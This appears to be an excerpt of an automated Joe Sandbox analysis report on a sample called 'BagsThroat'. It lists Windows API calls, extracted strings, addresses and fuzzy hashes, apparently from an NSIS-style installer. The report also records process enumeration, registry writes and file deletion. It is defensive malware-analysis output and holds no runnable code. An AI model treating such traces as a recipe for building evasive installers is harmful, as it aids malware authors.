                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $ @$M$N
                                        • API String ID: 1638840714-3479655940
                                        • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                        • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                        Strings
                                        • \*.*, xrefs: 00406D2F
                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                        • ptF, xrefs: 00406D1A
                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                        • API String ID: 2035342205-1650287579
                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                        APIs
                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                        Strings
                                        Similarity
                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                        • String ID: F$A
                                        • API String ID: 3347642858-1281894373
                                        • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                        • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        Similarity
                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                        • API String ID: 1916479912-1189179171
                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                        APIs
                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                        Strings
                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                        • API String ID: 542301482-1377821865
                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                        Strings
                                        Similarity
                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                        • API String ID: 20674999-2124804629
                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                        • GetSysColor.USER32(?), ref: 004041DB
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                        • SetCursor.USER32(00000000), ref: 004042FE
                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                        • SetCursor.USER32(00000000), ref: 00404322
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                        • String ID: F$N$open
                                        • API String ID: 3928313111-1104729357
                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                        APIs
                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                        • wsprintfA.USER32 ref: 00406B79
                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                        • API String ID: 565278875-3368763019
                                        • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                        • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                        • DeleteObject.GDI32(?), ref: 004010F6
                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                        • DeleteObject.GDI32(?), ref: 0040116E
                                        • EndPaint.USER32(?,?), ref: 00401177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
